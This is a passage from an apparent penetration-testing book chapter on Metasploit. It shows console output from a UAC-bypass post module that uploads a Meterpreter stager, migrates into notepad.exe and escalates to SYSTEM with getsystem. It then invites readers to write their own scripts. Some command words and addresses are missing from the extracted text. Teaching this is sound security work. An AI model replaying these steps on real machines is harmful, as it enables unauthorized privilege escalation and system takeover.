background image


Chapter 16

[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 2 opened ( -> at Thu June 09

19:50:54 -0500 2011

[*] Session ID 2 ( -> processing InitialAutoRunScript

'migrate -f'

[*] Current server process: tYNpQMP.exe (3716)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3812
[*] New server process: notepad.exe (3812)

msf post(bypassuac) > 

sessions -i 2

[*] Starting interaction with 2...

meterpreter > 

getsystem system (via technique 1).
meterpreter > 

We could also have executed 


 instead of 


 within the Meterpreter 

console and it would have leveraged the default options and executed with-
out having to set up the various options.

Notice in the preceding example that we succeed in gaining system-level 

rights on a target machine with UAC enabled. This small example demonstrates 
how the post exploitation modules will ultimately be set up and converted.

This script works simply by uploading a previously compiled executable to 

the target machine and then running it. Take a look at the post exploitation 
module for a better idea of what’s going on behind the scenes:

root@bt:/opt/framework3/msf3# nano modules/post/windows/escalate/bypassuac.rb

Wrapping Up

We won’t cover all the details of the post exploitation module because it 

is nearly identical to the attack shown in Chapter 13. Carefully walk through 
each line, and then try to build and run your own module.

Walk through existing Meterpreter scripts and look at the different com-

mands, calls, and functions that can be used to create your own script. If you 
come up with a great idea for a new script, submit it to the Metasploit devel-
opment team—who knows; it might be a script that others can use!